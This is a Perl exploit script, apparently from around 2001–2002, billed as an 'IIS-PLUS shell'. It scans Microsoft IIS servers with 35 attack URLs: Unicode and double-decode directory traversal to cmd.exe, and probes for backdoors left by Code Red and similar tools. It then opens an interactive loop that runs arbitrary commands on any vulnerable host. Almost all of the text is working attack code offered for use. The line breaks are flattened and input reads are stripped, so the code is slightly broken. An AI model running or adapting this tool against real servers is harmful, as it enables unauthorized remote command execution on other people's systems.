#!/usr/bin/perl -w ################################################################ # WARNING! # # THIS SCRIPT CAN RUN ON WINDOWS MACHINE ONLY (with ActivePerl)# # U CANT USE WITH UNIX BASED MACHINE!!!! # ################################################################ # Status of Art of PERL script to execute commands # on IIS vulnerable servers using 35 ways # (like unicode Codered and some other backdoor) # Use port number with SSLproxy for testing SSL sites # Andrea Spabam 2001 GPL2 or highter # spabam@go.to http://spabam.da.ru use strict; use IO::Socket; # Globals Go Here. my $host; # Host being probed. my $port; # Webserver port. my $command; # Command to issue. my $url; # URL being used. my @results; # Results from server. my $probe; # Whether to display output. my @U; # Unicode URLS. # URLS - Feel free to add here. # $U[0] always used for custom URL. $U[1] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[2] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[3] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[4] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[5] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[6] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[7] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[8] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[9] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[10] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[11] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[12] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[13] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[14] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+"; $U[15] = "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[16] = "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[17] = "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[18] = "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[19] = "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[20] = "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; # END UNICODE TEST $U[21] = "/scripts/root.exe?/c+"; $U[22] = "/msadc/root.exe?c+"; # END CODERED TEST $U[23] = "/cgi-bin/root.exe?/c+"; $U[24] = "/samples/root.exe?/c+"; $U[25] = "/iisadmpwd/root.exe?/c+"; $U[26] = "/_vti_cnf/root.exe?/c+"; $U[27] = "/_vti_bin/root.exe?/c+"; $U[28] = "/adsamples/root.exe?/c+"; $U[29] = "/scripts/cmd.exe?/c+"; $U[30] = "/scripts/cmd.exe?/c+"; $U[31] = "/cmd.exe?/c+"; $U[32] = "/root.exe?/c+"; # END ROOT-BACKDOR TEST $U[33] = "/sensepost.exe?/c+"; $U[34] = "/scripts/sensepost.exe?/c+"; # END SENSEPOST (unicodeloader) BACKDOR TEST $U[35] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; # END IIS CGI DECODE ERROR TEST # SUBROUTINES GO HERE. &intro; &scan; &choose; &command; &exit; # Play safe with this . sub intro { &help; &host; &server; sleep 3; }; # host subroutine. sub host { print "\nHost : "; $host=; chomp $host; if ($host eq ""){$host="localhost"}; print "\nPort : "; $port=; chomp $port; if ($port =~/\D/ ){$port="80"}; if ($port eq "" ) {$port = "80"}; }; # end host subroutine. # Server string subroutine. sub server { my $X; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\nTrying to obtain IIS Server string ..."; $probe = "string"; my $output; my $webserver = "something"; &connect; for ($X=0; $X<=10; $X++){ $output = $results[$X]; if (defined $output){ if ($output =~/IIS/){ $webserver = "iis" }; }; }; if ($webserver ne "iis"){ print "\a\a\n\nWARNING : UNABLE TO GET IIS SERVER STRING."; print "\nThis Server may not be running Micro\$oft IIS WebServer"; print "\nand therefore may not be exploitable using the"; print "\nUnicode Bug."; print "\n\n\nDo You Wish To Cont ... [Y/N]"; my $choice = ; chomp $choice; if ($choice =~/N/i) {&exit}; }else{ print "\n\nOK ... It Seems To Be Micro\$oft IIS."; }; }; # end server subroutine. # scan subroutine. sub scan { my $status = "not_vulnerable"; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\nScanning Webserver $host on port $port ..."; my $loop; my $output; my $flag; $command="dir"; for ($loop=1; $loop < @U; $loop++) { $flag = "0"; $url = $U[$loop]; $probe = "scan"; &connect; foreach $output (@results){ if ($output =~ /Directory/) { $flag = "1"; $status = "vulnerable"; }; }; if ($flag eq "0") { print "\n$host is not vulnerable to URL Number $loop."; }else{ print "\a\a\a\n$host IS VULNERABLE TO URL NUMBER $loop !!!"; }; }; if ($status eq "not_vulnerable"){ print "\n\nSORRY $host is NOT Vulnerable to the Exploit."; &exit; }; }; # end scan subroutine. # choose URL subroutine. sub choose { print "\nURL To Use [0 = Other]: "; my $choice=; chomp $choice; if ($choice > @U){ &choose }; if ($choice =~/\D/g ){ &choose }; if ($choice == 0){ &other }; $url = $U[$choice]; print "\nURL: HTTP://$host$url"; }; # end choose URL subroutine. # Other URL subroutine. sub other { print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+"; print "\nHTTP://$host"; my $other = ; chomp $other; $U[0] = $other; }; # end other subroutine. # Command subroutine. sub command { while ($command !~/quit/i) { print "\nHELP QUIT URL SCAN Or Command eg dir C: "; print "\nCommand :"; $command = ; chomp $command; if ($command =~/quit/i) { &exit }; if ($command =~/url/i) { &choose }; if ($command =~/scan/i) { &scan }; if ($command =~/help/i) { &help }; $command =~ s/\s/+/g; # remove white space. print "HTTP://$host$url$command"; $probe = "command"; if ($command !~/quit|url|scan|help/) {&connect}; }; &exit; }; # end command subroutine. # Connect subroutine. sub connect { my $connection = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n"; $connection -> autoflush(1); if ($probe =~/command|scan/){ print $connection "GET $url$command HTTP/1.0\r\n\r\n"; }elsif ($probe =~/string/) { print $connection "HEAD / HTTP/1.0\r\n\r\n"; }; while ( <$connection> ) { @results = <$connection>; }; close $connection; if ($probe eq "command"){ &output }; if ($probe eq "string"){ &output }; }; # end connect subroutine. # output subroutine. sub output{ print "\nOUTPUT FROM $host. \n\n"; my $display; # if probe is a for server string display only first 10 lines. if ($probe eq "string") { my $X; for ($X=0; $X<=10; $X++) { $display = $results[$X]; if (defined $display){print "$display";}; sleep 1; }; # else print all server output to the screen. }else{ foreach $display (@results){ print "$display"; sleep 1; }; }; }; # end output subroutine. # exit subroutine. sub exit{ print "\n\n\nANDREA SPABAM 2002#."; print "\nspabam.da.ru spabam\@go.to"; print "\n\n\n"; exit; }; # Help subroutine. sub help { print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\n IIS-PLUS shell by SPABAM. 2002. spabam\@go.to"; print "\n"; print "\n A IIS HTTP exploit for Micro\$oft WebServers using 35 URL."; print "\n"; print "\n Command: SCAN URL HELP QUIT"; print "\n note.. web directory is normally c:\\Inetpub\\wwwroot"; print "\n\n\n"; }; # end help subroutine. # Another fine spabam.da.ru production ...